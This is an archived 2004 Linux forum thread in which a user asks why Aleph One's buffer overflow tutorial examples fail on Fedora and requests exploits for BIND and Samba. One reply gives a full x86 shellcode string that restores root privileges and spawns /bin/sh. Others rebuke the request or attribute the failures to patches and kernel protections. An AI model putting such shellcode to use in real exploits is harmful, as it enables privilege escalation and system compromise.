Buffer overflows .. not overflowing buffers ..

Buffer overflows .. not overflowing buffers ..

Post by moha » Sat, 17 Jan 2004 07:25:26


I've reading about buffer overflow attacks -- from the Aleph One and
Mudge tutorials ... the theory seems to make sense but none of the
examples worked on my system.

I'm running Fedora core on an old Pentium II laptop. Any suggestions /
comments ??

On another note -- I'm looking for linux security exploits to run some
security experiments. Any leads -- The attacks I'm particularly
interested in are buffer overflows for BIND, SAMBA etc

Thanks in anticipation
-mohan
 
 
 

Buffer overflows .. not overflowing buffers ..

Post by DarkSamura » Sat, 17 Jan 2004 08:22:34


try replacing the shellcode used in Aleph One's exemple with this one :

\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

 
 
 

Buffer overflows .. not overflowing buffers ..

Post by DarkSamura » Sat, 17 Jan 2004 09:39:13


Some other good links:

http://www.yqcomputer.com/

http://www.yqcomputer.com/

http://www.yqcomputer.com/

http://www.yqcomputer.com/ :
Getting around non-executable stack (and fix)
 
 
 

Buffer overflows .. not overflowing buffers ..

Post by unru » Sat, 17 Jan 2004 09:59:29


XXXX@XXXXX.COM (Mohan Rajagopalan) writes:

]I've reading about buffer overflow attacks -- from the Aleph One and
]Mudge tutorials ... the theory seems to make sense but none of the
]examples worked on my system.

]I'm running Fedora core on an old Pentium II laptop. Any suggestions /
]comments ??

]On another note -- I'm looking for linux security exploits to run some
]security experiments. Any leads -- The attacks I'm particularly
]interested in are buffer overflows for BIND, SAMBA etc

Do your own homework. Why should anyone here give you help in attacking
their systems?
 
 
 

Buffer overflows .. not overflowing buffers ..

Post by NeoSadis » Sat, 17 Jan 2004 11:16:19


They could be fixed through the kernel, or through the firewall (if it's
configured to). Also, fedora/redhat could've fixed the vulnerabilities,
and/or your version of BIND/Samba could be new enough to be fixed. Lastly,
it could be that those servers, if installed, are not active.

--
Man usually avoids attributing cleverness to somebody else -- unless it
is an enemy.
-- Albert Einstein
 
 
 

Buffer overflows .. not overflowing buffers ..

Post by rbla » Sun, 18 Jan 2004 00:01:20


Maybe because they patched their software?

Chris